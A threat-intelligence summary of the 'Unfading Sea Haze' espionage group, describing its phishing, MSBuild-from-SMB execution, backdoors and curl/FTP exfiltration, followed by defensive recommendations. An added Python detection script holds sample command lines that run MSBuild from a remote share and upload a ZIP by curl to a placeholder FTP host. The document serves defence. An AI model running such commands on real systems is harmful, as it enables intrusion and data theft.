Chinese Hackers Hide on Military and Govt Networks for 6 Years

Bitdefender researchers have uncovered a previously unknown threat actor named "Unfading Sea Haze," which has been targeting military and government entities in the South China Sea region since 2018. The group's activities align with Chinese geopolitical interests, focusing on intelligence collection and espionage, and share operational techniques with other Chinese state-sponsored groups, particularly APT41.

Unfading Sea Haze initiates attacks with spear-phishing emails containing malicious ZIP archives that house LNK files disguised as documents. Recent lures are U.S. political topics, and the ZIP files are deceptively named to appear as Windows Defender installers. The LNK files include obfuscated PowerShell commands that check for an ESET executable (ekrn[.]exe). If not found, the PowerShell script uses MSBuild to execute malware directly into memory from a remote SMB server, leaving no trace on the victim's machine.

The MSBuild-executed code is a backdoor named 'SerialPktdoor,' which allows remote control over the compromised system. The attackers maintain persistence by manipulating local administrator accounts and employing scheduled tasks to sideload malicious DLLs. Unfading Sea Haze uses various custom tools, including a keylogger named 'xkeylog' for capturing keystrokes, info-stealers targeting data from browsers like Chrome, Firefox, and Edge, and several Gh0stRAT variants (SilentGh0st, InsidiousGh0st, TranslucentGh0st, EtherealGh0st, and FluffyGh0st) offering extensive functionality and stealth.

Security Officer Comments:
The group employs a custom tool called 'DustyExfilTool' for secure data extraction via TLS over TCP. They also use Ps2dllLoader for in-memory .NET or PowerShell code execution and 'SharpJSHandler' as a web shell for executing JavaScript code. More recent attacks show that the threat actors have switched to the curl utility and the FTP protocol for data exfiltration, now using dynamically generated credentials that are changed frequently.
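Two of the behaviours described above (MSBuild executing a project pulled from a remote SMB share after being launched by a script host, and curl.exe uploading data over FTP) leave a recognisable shape in process-creation telemetry. The following is an added example, not code from Bitdefender or from this summary: a small detection pass over constructed, Sysmon-Event-ID-1-style process records. The record fields, the script-host list, the host names and IP addresses in the sample command lines, and the rule names are all assumptions made for the example.

```python
"""Heuristic detections for two Unfading Sea Haze TTPs over process-creation events.

The event shape (parent image, image, command line) mirrors Sysmon Event ID 1 /
Windows Security 4688; the sample records below are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (assumed field set)."""
    parent_image: str
    image: str
    command_line: str


# Script/command hosts that should not normally spawn MSBuild outside a build pipeline.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+')          # \\host\share\file
FTP_URL = re.compile(r"\bftps?://", re.IGNORECASE)          # ftp:// or ftps://
CURL_UPLOAD = re.compile(r"(^|\s)(-T|--upload-file|-u|--user)(\s|$)")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def msbuild_from_share(ev: ProcessEvent) -> bool:
    """MSBuild launched by a script host with its project file on a UNC path.

    This is the execution pattern described above: MSBuild compiles and runs code
    fetched from a remote SMB server, so nothing is written to local disk.
    """
    return (_basename(ev.image) == "msbuild.exe"
            and _basename(ev.parent_image) in SCRIPT_HOSTS
            and UNC_PATH.search(ev.command_line) is not None)


def curl_ftp_upload(ev: ProcessEvent) -> bool:
    """curl.exe pushing a file to an FTP/FTPS endpoint with explicit credentials."""
    return (_basename(ev.image) == "curl.exe"
            and FTP_URL.search(ev.command_line) is not None
            and CURL_UPLOAD.search(ev.command_line) is not None)


RULES = {"msbuild_from_share": msbuild_from_share,
         "curl_ftp_upload": curl_ftp_upload}


def scan(events):
    """Return (event_index, rule_name) pairs for every event that trips a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((idx, name))
    return hits


# Constructed sample telemetry (hosts and addresses are placeholders, not real IoCs).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
                 r"MSBuild.exe \\10.0.0.5\share\project.xml"),        # suspicious
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\MSBuild\Current\Bin\MSBuild.exe",
                 r"MSBuild.exe C:\src\app\app.csproj"),               # benign dev build
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\curl.exe",
                 r"curl.exe -T C:\Temp\a.zip ftp://203.0.113.10/up/ -u user:pass"),  # suspicious
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\curl.exe",
                 r"curl.exe https://example.com/index.html -o index.html"),           # benign
]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx].command_line}")
```

Both rules are deliberately narrow: MSBuild spawned by a developer shell with a local project file, or curl fetching over HTTPS, does not trip them. In production the same checks would be expressed as a SIEM or EDR query over the 4688/Sysmon fields rather than a Python loop, and a UNC-path MSBuild hit should be paired with the network telemetry for the SMB connection that the monitoring bullet under "Suggested Corrections" calls for.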

Suggested Corrections:
Researchers at Bitdefender recommend the following to mitigate the risks posed by the Unfading Sea Haze threat actor and similar groups:

  • Vulnerability Management: Start with prevention - companies must prioritize patch management to swiftly identify and address critical vulnerabilities. Implementing robust processes for patch deployment can significantly reduce the attack surface and mitigate the risk of exploitation. Prioritize addressing vulnerabilities with high CVSS scores, particularly for servers exposed to the internet that can lead to remote code execution.
  • Strong Authentication: Start with enforcing strong password policies that require complex characters and regular changes. Avoid password reuse across accounts. For an extra layer of protection, enable Multi-Factor Authentication (MFA) whenever possible. MFA significantly reduces the risk of unauthorized access even if your password is compromised. To future-proof your security posture, consider exploring passwordless authentication options compliant with the FIDO2 standard.
  • Proper Network Segmentation: Implementing proper network segmentation and adopting a zero trust networking model are crucial steps in enhancing security posture. By segmenting the network into smaller, more manageable zones and enforcing strict access controls based on the principle of least privilege, organizations can limit the lateral movement of threat actors and minimize the potential impact of a breach.
  • Multilayered Defense: Adopting a multilayered security approach is essential. Organizations should invest in a diverse range of security controls, including network segmentation and endpoint protection to create overlapping layers of defense against cyber threats.
  • Network Traffic Monitoring: Maintain network traffic monitoring to identify unusual communication patterns that might indicate remote code execution or cloud storage interactions employed by malware. Additionally, web filtering solutions can help block access to malicious websites that might be used for malware distribution.
  • Effective Logging: Ensure logging is enabled, functional, and provides sufficient information and historical data for effective support when needed. Robust logging mechanisms can aid in post-incident analysis, forensic investigations, and monitoring for suspicious activities. Regularly review and update logging configurations to capture relevant security events and maintain visibility across the environment.
  • Detection and Response: Despite your best efforts, it is still possible that modern threat actors will make it past your prevention and protection controls. This is where your detection and response capabilities come into play. Whether you get these capabilities as-a-product (EDR/XDR) or as-a-service (MDR), the purpose is to minimize the time when threat actors remain undetected.
  • Collaboration and Information Sharing: Foster collaboration within the cybersecurity community to share threat intelligence and best practices. By participating in information-sharing initiatives and collaborating with industry peers, organizations can gain valuable insights into emerging threats and enhance their cyber resilience.